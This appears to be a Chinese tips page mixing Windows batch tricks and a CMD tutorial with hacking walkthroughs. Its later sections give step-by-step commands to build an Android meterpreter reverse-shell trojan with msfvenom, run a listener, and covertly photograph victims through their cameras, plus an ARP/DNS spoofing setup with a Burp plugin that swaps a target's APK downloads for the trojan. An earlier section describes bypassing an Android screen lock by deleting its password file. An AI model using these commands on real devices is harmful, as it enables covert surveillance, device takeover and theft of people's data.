电脑操作技巧

发布时间:2018-07-02 06:49:18

电脑操作技巧

U变成只读的

先新建一个文本文档,然后把下面的代码复制过去,然后再另存为“加锁.bat”。

@echo off echo u.diannaodian.com echo reg add HKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies /v WriteProtect /t REG_DWORD /d 00000001 echo 成功 pause
当要防止U盘复制的时候双击这个文件就可以了,恢复的方法就是将00000001变成00000000保存后运行就可以了
U盘锁住你的笔记本!

U盘密钥制作方法,可以有效的闲置私人电脑被他人使用,既安全,又简单!没有密钥谁也搞不起!

准备好一个闲置的U盘,容量大小不限(128MB的也可以)。插入电脑后先将其格式化为FAT32格式,如下图:

U盘内创建一个TXT文件(新建文档),名字任意,此文档的用意就是使其可以正确的识别优盘信息,也是启动密钥的文件。

在文档中输入:@echo off if not exist G:\aa.txt shutdown -s -t 5 -c"请插入启动钥匙,否则无法登录系统"


注意拼写正确及标点,其中G为你的U盘盘符填写正确后,确认无误保存即可。然后将TXT文档复制到桌面上,双击打开文档,将其另存为“U盘密钥.bat”文件形式。

当完成.bat文件创建后,返回U盘中新建一个aa.txt文件。此上操作完成以后,计算机开机会自动扫描U盘里的信息,查看是否有aa.txt文件,如果没有查找到,系统会在五分钟内强制关闭计算机

优盘密钥本地组策略设置本地组策略设置由于目前市场上计算机种类出厂设置的不同,为了确保计算机开机时可以自动加载U盘密钥.txt文件(最早创建的文本),我们还需进入计算机本地组策略编辑器进行一些设置。点击开始在搜索框内输入Gpedit.msc→进入本地组策略设置

依次展开计算机配置→Windows设置脚本分支,然后双击启动项。

接着选择添加按钮,并单击浏览按钮选择桌面上已经设置好的优盘密钥.bat文件。

加载完毕后单击确定即可。现在重启你的计算机试试此类本地安全措施是否有效!

安卓手机忘记密码

种方法:桌面RE管理器
手机端的RE资源管理器,桌面端也有!这款RE管理器权限是和手机端一样的,操作需谨慎啊!

另一种是用的文件夹连接:

第二种方法
删除密码文档这个方法的原理和我们之前讨论破解Windows密码类似,PC系统的密码是存在Sam里的,而Android系统密码是存在password.key文件里面的。所以说,我们如果能删除掉这个文件,安卓系统的密码就解了!
找到那个*.key文件删除就可以了

CMD命令教程

CMD是什么?

windows环境下,命令行程序为cmd.exe,是一个32位的命令行程序,微软Windows系统基于Windows上的命令解释程序,类似于微软的DOS操作系统。输入一些命令,cmd.exe可以执行,比如输入shutdown -s就会在30秒后关机。总之,它非常有用。

打开方法:开始-所有程序-附件 开始-寻找-输入:cmd/cmd.exe 回车。它也可以执行BAT文件。

运行CMD开启

开启

按下win+R或者开始菜单点击运行,输入cmd或者是command,回车,就会弹出一个黑框,这种叫做控制台程序,以前的老系统都是这样的,靠输入命令操作。

使用一个命令

实践

输入 echo hello world回车显示hello world

输入提示

cmd调用各种命令无非就是这样的格式 命令名[空格]参数1[空格]参数2....

认识变量

什么是变量?(会编程的自行跳过)变量就像一个盒子,你能过把一段数据存入这个盒子,当你需要时再取出来。就像“代数式”一样,例如a+1=?我们设a为1,就是指定义一个变量,值为1,然后这个式子等价于1+1。

cmd中使用

方式自行设定 set a=1输入这条命令后就完成了变量的定义并赋值为1。

怎么调用变量?

如调用变量a则书写为%a%可以这样查看赋值结果:echo %a%回车显示1方式从控制台输入 set /p a=这个命令是让使用者自行输入变量的值。注意如果 写成这样 set /p a=1a的值不会是1!a只会变成提示语。例如 set /p a=请输入命令

回车显示

然后再输入 233回车继而输入 echo %a%回车显示233我们可以利用set /p 来进行与用户的交互。

【每日黑客】MSF入侵安卓手机案例实践

这篇文章主要介绍了MSF入侵安卓手机的详细过程,又介绍了MSF是什么、以及作用,感兴趣的小伙伴们可以参考一下

MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。

我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息安全评估系统。里边安装了许许多多的工具。其中MSF就自带有。当然还有其它的 比如Kali linux 、Back Track这些等等。

环境:Backbox linux+MSF

目标:一台安卓手机

既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP

本机IP:192.168.1.6

在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示

msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径

这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具

输入命令:msfconsole

然后输入:

1. use exploit/multi/handler 加载模块

2.set payload android/meterpreter/reverse_tcp 选择Payload

3.show options 查看参数设置

我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

1.set LHOST 192.168.1.6 这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口

3.exploit 开始执行漏洞 开始监听...

OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件

还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试

安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了

我们可以在我们的MSF里看见有一个会话连接了

这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo

webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头

webcam_snap 隐秘拍照功能

后边跟上参数-i 指定使用那个摄像头拍照

可以看见我们分别对前后摄像头都拍了照 保存到了桌面上

还可以输入命令webcam_stream 开启摄像头

内网渗透之手机控制

从wifi破解到pc及手机控制,给大家分享个手机下载apk替换的方法

(一)环境:

目标机:192.168.247.130
渗透机kali:192.168.247.129
网关:192.168.247.2

(二)用到的工具:

1.arpspoof
2.dnsspoof
3.burp
4.jython-burp-api (kali里没有集成,需要另外安装,详细请参见:https://github.com/mwielgoszewski/jython-burp-api)

(三)步骤:

1.使用arpspoof来发送arp欺骗包;

arpspoof -i eth0 -t 192.168.247.130 192.168.247.2

2.使用dnsspoof进行dns欺骗;

3.使用msf来生成一个安卓木马;

4.msf进行监听,等待木马反弹连接;

5.编写python脚本,用于apk下载重定向,代码如下,注意:将这段代码保存到jython-burp-api下的Lib目标下,并命名为testplugin.py

1. from gds.burp.api import IProxyRequestHandler

2. from gds.burp.core import Component, implements

3. class ExamplePlugin(Component):

4. implements(IProxyRequestHandler)

5. def processRequest(self, request):

6. if ".apk" in request.url.geturl():

7. print "apk download detected, redirecting"

8. request.host = "192.168.4.84"

9. request.raw = ("GET /1.apk HTTP/1.1\r\n" +

10. "HOST: 192.168.4.84\r\n\r\n")

6.编辑jython-burp-api中的burp.ini配置文件;

7.启动burp,命令:java -Xmx1g -jar burpsutie.jar
8.对burp进行设置

9.在burp里加载jython

10.当目标开始下载apk的时候,就会替换为我们指定的apk进行下载

11.这时burp中的jython控制台如下:

12.当目标安装并运行下载的apk后msf成功收到反弹;

电脑操作技巧

相关推荐